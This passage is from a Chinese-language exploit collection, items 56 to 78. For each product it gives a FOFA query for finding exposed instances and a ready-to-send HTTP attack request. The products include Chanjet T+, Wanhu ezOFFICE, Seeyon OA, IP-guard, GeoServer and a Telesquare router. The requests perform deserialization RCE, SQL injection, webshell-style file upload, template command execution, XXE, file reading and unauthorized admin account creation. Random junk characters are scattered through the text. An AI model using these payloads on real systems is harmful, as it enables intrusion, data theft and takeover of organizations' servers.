/ A8 |" P& n) l# ]' t" E3 [: N56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- O( O. o# ]# t4 o3 b2 D5 m3 {
FOFA: app="畅捷通-TPlus") _7 ~, x5 W$ m4 B/ x* k4 z8 v
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
% b- Z( g. T) l) Q) sHost: x.x.x.x2 v+ t# P/ s. t$ y$ }4 s% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.369 w: @) o3 k7 z8 _- r" a
Content-Type: application/json
, I2 J2 {5 ^# g) K5 b& K8 l! D2 C8 m
{
; t9 R5 h9 y' c! k6 g "storeID":{( i8 @' i% }" ?% X+ U1 Q/ @
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 r( z. m( f, i0 T1 @, @' N( D" f "MethodName":"Start",/ Q( B1 j2 D& h) m, C7 S$ J7 ~( c
"ObjectInstance":{% F2 E5 e; |, t: X* ^. u
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& U! C* y, r* h" R) j, o6 }5 e
"StartInfo": {9 u7 V! P& x, v" ~- i
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",! u0 u6 e7 @4 d
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
1 A8 Y @2 G, R4 O. {! {9 E }2 J( E7 M/ l9 V2 v7 G3 C5 ?7 u; E8 u
}/ \( _; P! @5 Q8 H, P
}
8 c2 N1 P C& i2 p- p$ a}4 _0 m% V2 R% t% S4 M
?) L4 ]9 x7 `! \6 y
, e& Y. n( {6 @57. 畅捷通T+ keyEdit.aspx SQL注入
& a# M5 Y0 V% j6 l& y( S3 n8 gFOFA:app="畅捷通-TPlus"
) q3 V: ?) E1 YGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
0 @2 ?4 u8 p4 z* BHost: host( J1 ]8 X0 g4 ^$ ]$ \
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" ^0 U8 X+ l( u; C" d( C! T
Accept-Charset: utf-8
* r# W+ }" S6 w+ H- JAccept-Encoding: gzip, deflate1 {# Q5 [) @4 B4 x) @3 B
Connection: close
# F$ M4 p/ R9 V4 U
) C+ s5 J: B7 k4 Z+ a+ q' P( o- d N V3 ]7 o, A( C1 r- ^& V
58. 畅捷通T+ KeyInfoList.aspx sql注入% m% q# K) m! N2 q) {
FOFA:app="畅捷通-TPlus"
7 e8 @7 h; B; B( E& N! D4 ]/ iGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1, U( F/ S! `' D4 Q
Host: your-ip- q7 A8 h# _1 y
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 m" y* j2 k& {) b0 [& @
Accept-Charset: utf-8/ |0 e$ j; o4 g$ a# s+ T
Accept-Encoding: gzip, deflate" `( o1 n+ M# @* Y1 k
Connection: close' E- p& h, a8 l- C$ v0 o
" a D! U- O- [! W! X# ^6 e5 j o3 G$ x" ~
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
$ ^4 Q) Z" a' ^: B: Z6 @1 h$ \) sFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
, v2 I5 m$ c1 ]9 B/ @POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.19 f | Q' O/ Z% J5 t. C
Host: 192.168.86.128:9090
; L7 c# S2 |( {User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 J% P ?0 q5 D$ [3 y2 rConnection: close7 K* _4 ?7 b w9 z
Content-Length: 1669! \2 N6 I) Y& s3 I, c
Accept: */*! u7 A: m) q, M! `/ s' \
Accept-Language: en
; w& Q$ h8 n2 u' NContent-Type: application/x-www-form-urlencoded; v$ D; y6 c$ d; z9 A! T
Accept-Encoding: gzip- v( k& S8 C3 `/ X
) v3 l9 e8 o7 E. ZPAYLOAD! y! O5 C+ T, s% B
: Y/ a" M# n' H% { T% n { R
60. 百卓Smart管理平台 importexport.php SQL注入! |7 @+ W3 B, U X$ U; A: }7 X* m; _
FOFA:title="Smart管理平台": F6 k5 |% z J/ \8 W1 P! ~
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1* p. z" p7 V7 w. R$ ^" A
Host:
# e8 J% `+ g: E1 r* }3 w; FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& O6 [; s- D' B; W8 @3 P1 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ ^6 o, U; b; S$ L
Accept-Encoding: gzip, deflate
& y, K6 i+ }$ {& w2 cAccept-Language: zh-CN,zh;q=0.9
, I3 f% }9 @5 u. z# b- i# z2 \. |$ L8 PConnection: close3 I+ f3 c Y& P/ l# T1 m4 A
! r9 J z" ?; v) q
% |4 x( B7 k6 A' i9 I
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! @* _: w9 `( i& G; L
FOFA: title="欢迎使用浙大恩特客户资源管理系统"5 m; D5 E [ ~" V* e) U$ J# R$ }- T
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1$ @/ z" B: o4 _' x0 Q
Host: x.x.x.x
6 f, U" w* _. U$ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% b( }. V |/ u7 O3 S; \" D
Connection: close' S: _$ j% k+ k. j
Content-Length: 27
) A6 D* W8 q. G, r, ], KAccept: */*
# |3 I# L6 c8 a9 ^ YAccept-Encoding: gzip, deflate6 j9 b. A/ @3 J) @
Accept-Language: en
3 {# N% f* e. X) ?" R, w; @' x! s1 fContent-Type: application/x-www-form-urlencoded$ W, T& K Y* ?0 q" W& z! m, p
2 ]* x* @' a) a8 m, h! @8uxssX66eqrqtKObcVa0kid98xa
9 Z. F$ u9 M' m/ @2 N. y* N9 }
; q ?7 h1 w3 [- z
62. IP-guard WebServer 远程命令执行9 Z* |" b/ j3 O$ t0 g
FOFA:"IP-guard" && icon_hash="2030860561"
5 u) `/ ~1 ~8 I& A; t& xGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
6 o9 P/ v9 y, T) u! THost: x.x.x.x' V7 [; j; v( V, q: q) ?
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
; u: B. b: q. [, @$ W; LConnection: close
7 l1 x" R: O( Y: I5 [4 C7 nAccept: */*
& }7 B: F# b! e2 XAccept-Language: en5 U" j) A w7 u
Accept-Encoding: gzip( E6 @: N0 Y0 G# |% |" z
6 a+ @4 d1 ]& ^1 F8 g( t7 ^6 H
. ]* t$ w+ P- X( S+ z访问' W& `4 I6 J0 z
. q% f/ f5 h4 D8 y# Q% E0 Y1 w i
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
7 F+ }* ?3 @/ F* WHost: x.x.x.x
1 r7 Z( |5 C. }- C# [1 c% `" d9 j; g6 j9 ]& h
, P3 E0 G' ]& ^+ W0 Q7 _5 E9 k% d
63. IP-guard WebServer任意文件读取
$ S0 H9 X! ]. S# PIP-guard < 4.82.0609.0
' T0 T4 M2 ^- ?' o$ U$ aFOFA:icon_hash="2030860561"
( z4 c1 ^* R3 l5 d4 KPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
( Z2 [$ Y7 J- b+ z9 b; `! ]Host: your-ip
7 S# Q4 u0 q9 ^! @2 b* }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: X, Q9 x+ e- K6 G" ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; U; X: t+ `" u7 ?9 {
Accept-Encoding: gzip, deflate
' B3 {4 `. R n4 q# O5 [* e2 }Accept-Language: zh-CN,zh;q=0.93 E2 x" K3 M6 X9 |
Connection: close
5 d8 R! K" u& T- j: O; T4 Y* DContent-Type: application/x-www-form-urlencoded
: }+ l2 F, D& B" A
* G- @! G3 |# X6 @3 ~path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ q$ p$ W4 x& a# v r* ^. h; j+ T9 o, h1 P# f" S
64. 捷诚管理信息系统CWSFinanceCommon SQL注入" E. |; L8 f' b5 ^$ j1 X
FOFA:body="/Scripts/EnjoyMsg.js") L( N# K: W& K' }0 d3 J
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
# Q; W- B7 x( n0 lHost: 192.168.86.128:90010 ~0 p6 ?( C3 f6 k! O
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
& ~+ X# i! |4 }# _* O+ ]Connection: close
9 x( A7 F! r- D3 hContent-Length: 3691 }# j6 a2 T1 \
Accept: */*
* g4 S, ?9 k4 {2 J! OAccept-Language: en' j9 h# N' K/ }) n- S. a/ m
Content-Type: text/xml; charset=utf-8; `# H& d- M1 Q1 t7 `5 R) l% ?
Accept-Encoding: gzip3 ^& q8 V2 J5 u9 n# e0 H
, u: g7 p" c. A. {- ^/ F
<?xml version="1.0" encoding="utf-8"?>- g3 b$ M# y6 c% ^! y
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 A/ z7 c# n/ _" J/ w. V" e
<soap:Body>0 P0 t7 R$ L% v
<GetOSpById xmlns="http://tempuri.org/">! W/ p2 j' s. b
<sId>1';waitfor delay '0:0:5'--+</sId>9 i) N3 e2 P- r
</GetOSpById>" l3 k0 F8 l8 x$ O' A2 U6 P" l
</soap:Body>
' ^, L. U, y& H/ M. Z</soap:Envelope>
( a9 l( O6 ^- L0 n
* A. P& O- S7 J" Q2 j& m% n
4 Q. I7 c' G/ B65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
% Y& e5 t" u5 C7 {5 ]$ z) SFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"; D; _: e, |" ?8 G
响应200即成功创建账号test123456/1234560 e' h/ L) C5 p, \
POST /SystemMng.ashx HTTP/1.1
8 S% Z i w2 D; FHost:
- u" P( ~6 ^% J( v1 f! B. pUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)4 M. q& N8 w. F7 ~) X% p4 f- s9 u
Accept-Encoding: gzip, deflate
, M/ |) z4 w( w' [5 A qAccept: */*/ e5 A: a2 Q) q" D2 |' |$ T9 m
Connection: close; c9 Q$ v1 {# Q7 S( S. Y
Accept-Language: en$ ]1 ?; j) R' m% U
Content-Length: 174
3 \( O: a2 ]0 } o8 a P
, c2 Y# z( M3 b# N8 GoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators* @: I. e1 x; l6 l
/ j" b3 w4 x. a, p4 k h- o& s$ b
: h5 ]2 R* m* } f0 ^
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入# M* m; K3 C8 U$ f4 N H& y; [
FOFA:app="万户ezOFFICE协同管理平台"! v! g! ~- G( l+ l! T- \
: ~9 X: t. E* Y# O! e. rGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.11 H5 o' k' H! l3 T) n7 f
Host: x.x.x.x
/ k$ Q+ {4 C" ` LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- |( I) f! d# u% @( \: l- N
Connection: close3 b# c9 I2 Q9 T4 }$ Z
Accept: */*( ^1 ~) u# k7 W
Accept-Language: en
9 O+ B( h6 o. G" G1 v3 B6 x/ yAccept-Encoding: gzip
6 v1 g5 `- T+ L& G3 Y1 }( q0 y% n# B( m, {
" `$ Z4 r8 N( }7 q; S) v0 M; V第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在6 u2 o/ i) K0 y+ v$ B' A
" h( q5 q! n. z5 Y& Q; k+ V
67. 万户ezOFFICE wpsservlet任意文件上传8 m/ X% I: h2 d" z- T. {
FOFA:app="万户网络-ezOFFICE"
' m6 d9 @2 H7 h( ^9 f& SnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型6 a5 N4 _- `& l3 ?9 `5 `2 W/ p! H
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1/ U1 V9 ^# k j3 s
Host: x.x.x.x
0 k/ o: n* h! s c& [6 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0# k, Y7 x/ c! h8 n8 L* Y
Content-Length: 173
2 b. u& ?$ C( Y1 r0 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 v5 O4 ~* L$ BAccept-Encoding: gzip, deflate
0 D* {+ E7 ]" N4 T/ CAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3# M O, k3 P9 R# L7 M2 V7 A
Connection: close
* @8 {) B7 n5 a2 ]/ _Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp; O# R+ X# d3 s& T+ B* r1 P
DNT: 15 K. C7 w; v: r* t% S
Upgrade-Insecure-Requests: 1
6 \8 e. b. R P' u* D- C( g7 H, c& q8 ~$ t9 ?
--ufuadpxathqvxfqnuyuqaozvseiueerp
3 W/ K2 K$ S4 l8 rContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
9 d+ {1 e$ j. k* `# R u. A% g; {* b" W# u
<% out.print("sasdfghjkj");%> Z8 I7 C e' i/ ]# _' W- q
--ufuadpxathqvxfqnuyuqaozvseiueerp--
- q3 |5 p) h- A3 o H- k' {6 I0 [3 j% v+ Z
$ z& N o U2 L% E文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) j" O2 n1 ]7 _: N; @# b1 F. k5 k: p1 Z& e: p8 P% Q
68. 万户ezOFFICE wf_printnum.jsp SQL注入
& {9 E/ N; @7 B/ |FOFA:app="万户ezOFFICE协同管理平台"9 \5 N' t% e4 g$ R
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
* W, z5 \6 G; w+ B# H0 tHost: {{host}}" G" }3 ^, h- {3 s4 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 `7 y/ L+ Z& b+ P7 t: N4 j, c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& Q6 z0 }+ S6 r4 b! |
Accept-Encoding: gzip, deflate
! H# v, ]& d, C- e$ V" z( yAccept-Language: zh-CN,zh;q=0.9) A) _+ l8 n7 @
Connection: close
0 l* W! w' m& ]* B9 B: J7 L% G2 d3 }+ D1 L
5 ?8 P6 E- O! Q* U) I69. 万户 ezOFFICE contract_gd.jsp SQL注入% a$ Z/ W g4 _
FOFA:app="万户ezOFFICE协同管理平台"! n1 X/ `3 J3 C, V/ U! f
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.16 [5 Z4 H5 s! E+ a: K- _
Host: your-ip0 k2 d, k- W1 {- t" Z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! z& M' a2 f. C+ K6 T( \
Accept-Encoding: gzip, deflate9 V) k, d2 H$ T3 x
Accept: */*) U; L% f# j+ U% w
Connection: keep-alive' p7 R* f6 N0 J: C$ U
5 f5 g& |3 H) ?/ x- M% \( Z( C1 A2 C8 {. y
70. 万户ezEIP success 命令执行- ]: a- I/ r' W. Y$ j0 \
FOFA:app="万户网络-ezEIP"( L2 U& |9 {8 p0 b
POST /member/success.aspx HTTP/1.19 r% a: p; Q8 u4 B& Q+ P
Host: {{Hostname}}* P7 z+ D; i7 I, M; c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 p3 l T7 [( ~1 Y- ]
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=' [( G/ |2 o! ?/ r; s
Content-Type: application/x-www-form-urlencoded6 `3 ~2 D% O# F0 P
TYPE: C' x% Q7 y d9 ?) |
Content-Length: 16702( D% q' w- L1 R" y
; K/ n- r# t5 b+ e& Y6 Z# \__VIEWSTATE=PAYLOAD; F9 K5 L6 I0 D5 a( }) m
! R! x& ]6 w M8 E, N& H# m$ s6 v5 A) K2 ~' [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* z% w# c# r+ W1 M9 S% a0 U, p8 d
FOFA:body="PM2项目管理系统BS版增强工具.zip"; U! o# x+ H: T) W5 W" G5 W: N
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1" f5 r% \( `- ]4 D; b0 H) Z
Host: x.x.x.xx.x.x.x
9 N! \' z; e+ rUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) g# T) F( w' }/ d1 d6 f1 V
Connection: close
# v+ o4 ?6 D3 u5 y( k$ DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ t& ?4 E! l1 D4 f, _7 T
Accept-Encoding: gzip, deflate
; I0 w7 @! h8 }* ?! H7 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' j) e5 Q6 i3 G/ g
Upgrade-Insecure-Requests: 1
# b( Q, u) ]7 o# U. t7 G& |: | s
( k' \7 P( |9 [* q6 S% w3 P# X
( |- p& K, z$ T$ }: S/ e8 A) [. d! k72. 致远OA getAjaxDataServlet XXE3 B) B+ z, v/ B& `+ w+ T. z' U6 _
FOFA:app="致远互联-OA"
$ i$ f5 u3 a: K& |' z& E1 U: zPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1, Y* G! Q! Y5 c7 i
Host: 192.168.40.131:8099
6 n3 V- x, ]5 _& ?3 v* rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) L+ V# S$ G( \; @0 QConnection: close; s* r- `" z1 Z: D/ T
Content-Length: 583! A: C! ~/ x" g' M/ A
Content-Type: application/x-www-form-urlencoded
" J8 j9 L q7 k# d; ZAccept-Encoding: gzip
: j& v. _% A0 e! {4 t) V0 k# m2 r I- W' b+ m) @# t6 W
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
# b" C8 u E+ K H2 a5 O$ r ? z+ O0 K) n6 k' W/ @" z
! z1 P- e. j9 w9 l% h/ G2 [73. GeoServer wms远程代码执行; H/ {- G( C5 v9 v. f
FOFA:icon_hash=”97540678”
; \# C2 H D v. l+ @$ f" q& ^) \ ~POST /geoserver/wms HTTP/1.1' ~; o3 [( h) {/ J& r/ G( Q3 \
Host:" I" k: b/ e: m$ N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36; W9 P) G. b+ H4 B* _1 P
Content-Length: 19817 Q& Q1 G# [% k2 b
Accept-Encoding: gzip, deflate
. b5 X/ @" _$ x( A+ y, @0 m6 f. wConnection: close
4 N6 P" s1 B# C9 E& pContent-Type: application/xml
4 {5 ^; ~1 O$ i+ r4 mSL-CE-SUID: 3
4 v- V: {% Y( ?
1 V% c4 T9 E5 PPAYLOAD, D, {) p& M+ K( `5 a6 R- C6 j
4 |- Y$ K3 U; Z# R0 j$ Y7 E
$ @8 s8 _ A4 t9 `- U3 Y3 b
74. 致远M3-server 6_1sp1 反序列化RCE
' B7 V2 w* g4 _% N7 }! nFOFA:title="M3-Server"
8 O3 K* M2 K/ F# y2 }PAYLOAD
; O2 H3 |& Y) v9 m' i# Z% U/ R! Y( o3 m/ G% f3 F
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' `' v% t# P% r6 yFOFA:app="TELESQUARE-TLR-2005KSH"( c$ S/ F# j( W6 [( ^
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.12 D% |% k) ]6 G9 l$ c
Host: x.x.x.x$ T/ W8 V8 F8 s% M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
B7 X& E8 l( O4 K+ s. G3 OConnection: close6 d7 _7 t% x' S' m+ E ~' l5 J* T
Accept: */*/ ^2 A8 q1 h' G9 q& M
Accept-Language: en) O m9 ^% ~6 o( H) ^: O v6 s
Accept-Encoding: gzip+ D& Q/ O. z* v4 S/ X q6 V/ U
$ L" q. y, v1 I& Q$ ^& i
* V x- l# j- } L& kGET /cgi-bin/test28256.txt HTTP/1.1- z' G8 l- D$ G! g4 i! Y) c# ~0 M
Host: x.x.x.x
, \' j6 @+ P" G- c0 Z+ l$ J: z7 }; U# a1 S* p% t
4 B8 C3 ~+ U- O% W/ [
76. 新开普掌上校园服务管理平台service.action远程命令执行
& E& R* Y! v; g/ Z, }* y$ LFOFA:title="掌上校园服务管理平台"! O+ {+ }' m8 ?/ ]
POST /service_transport/service.action HTTP/1.1
% r1 d! N5 n. c/ p. e% z1 b' AHost: x.x.x.x
# V- o- A) h; |) z" JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
7 {4 z1 `3 o3 b9 x" hConnection: close
1 M1 H' D7 x. q) \2 JContent-Length: 211
9 r( d2 W: B3 s1 q$ ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 m6 h& L# u2 I1 d+ mAccept-Encoding: gzip, deflate Z! |* [+ z0 J: r6 v( m9 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 f8 Y+ h, w3 PCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
+ s9 b" E$ Q$ |0 @! n9 `Upgrade-Insecure-Requests: 1
. X4 s2 p( f& t& z5 T! E, a7 e
6 W4 a; H" y" W5 m! F& N) m/ P9 l{- M. D( m$ e! p
"command": "GetFZinfo"," Y0 x$ a# L. N4 x/ g6 E% O+ H
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"9 n, s O( b" d1 K2 ]" T; r. m- Z
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
% G- t4 T! n4 f7 z8 Q}/ Z5 R' S& q0 r5 P/ J7 B# c1 }% f3 Q$ q
2 c& \2 ^& a2 d, q6 v* `
. w( Z. I; t3 c1 _' P3 m4 f0 g' TGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1& ^6 o% {. _) p) b. v; M7 x
Host: x.x.x.x
9 v! F. C6 F- g6 M$ n5 U- H9 |* s/ K$ @" G l% `* |6 v
& ]2 c( u) I& }% U8 B
2 h% R* \+ \! K; Q( g9 n; B77. F22服装管理软件系统UploadHandler.ashx任意文件上传& r3 I" v* O8 `- k
FOFA:body="F22WEB登陆"& Q0 q6 F: W0 N
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
/ Y. k K2 E2 h8 hHost: x.x.x.x
5 z* Z: t+ u( V- y/ M8 W- ?& I! aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36. }* Q. ~# H% h! }# w
Connection: close
* L3 g% E* o- x# E; A% O9 ^- [5 RContent-Length: 4331 m L: O: r |/ U& K
Accept: */*3 f2 Q p" ?' p9 W# G% D) @
Accept-Encoding: gzip, deflate! B" o/ g, E: d6 t4 _
Accept-Language: zh-CN,zh;q=0.9
( H8 @ ^# D0 D OContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix3 J6 T/ {) A8 X$ y, S+ p
7 k: p! V0 _- B$ `
------------398jnjVTTlDVXHlE7yYnfwBoix5 y" g/ k E* y3 n: e% O1 E$ A
Content-Disposition: form-data; name="folder"
( L; r! P. ?, I6 m: {: R' ^* x8 T7 j0 k- l
/upload/udplog
8 o+ P( B) K- o1 M; m, |------------398jnjVTTlDVXHlE7yYnfwBoix& C6 m- V, v, n8 D1 W9 [* `
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
. B4 L; H8 D. M; y4 \1 e! }Content-Type: application/octet-stream
5 j4 U8 z w" a8 r; ^9 ^4 e% o0 u: b5 E5 J+ d( I4 F0 P# K
hello1234567; y2 J1 {; s% s' }
------------398jnjVTTlDVXHlE7yYnfwBoix5 M1 G, e9 B5 I# z% \% F
Content-Disposition: form-data; name="Upload"
! u3 _) I. G9 G; _% s) H! r( R+ z5 Q: `1 c! B
Submit Query
1 \( x0 W, B9 L& K& Q* v' ^' X$ |------------398jnjVTTlDVXHlE7yYnfwBoix--& H' p- X7 d% ]; V# @
7 n9 P4 i2 E- q |: t* L
]/ W9 b0 e% H& l. O0 x78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传; [4 x" o5 v8 H ^
FOFA:icon_hash="2001627082"
2 t0 M% K- p- [* y* ?8 a, jPOST /Platform/System/FileUpload.ashx HTTP/1.1/ [' V/ F- f, @% O
Host: x.x.x.x
7 K7 V( {1 F7 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 ?. {' i; Y& m
Connection: close
* r. |% X: `: R2 q1 k# ]Content-Length: 336 y7 s0 k( I, B' j
Accept-Encoding: gzip5 [# [. V! |. a$ Z2 s
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
4 ^4 o, m, q$ Y" G% {* q+ u0 P4 M9 i4 h$ x0 W$ o! z& ?
------YsOxWxSvj1KyZow1PTsh98fdu6l
3 B- n1 ^/ U8 k4 F0 W4 }Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt" L7 A2 H2 J* b' ~. G% ~; d
Content-Type: image/png, k3 L7 w# p, O, }4 C `( l
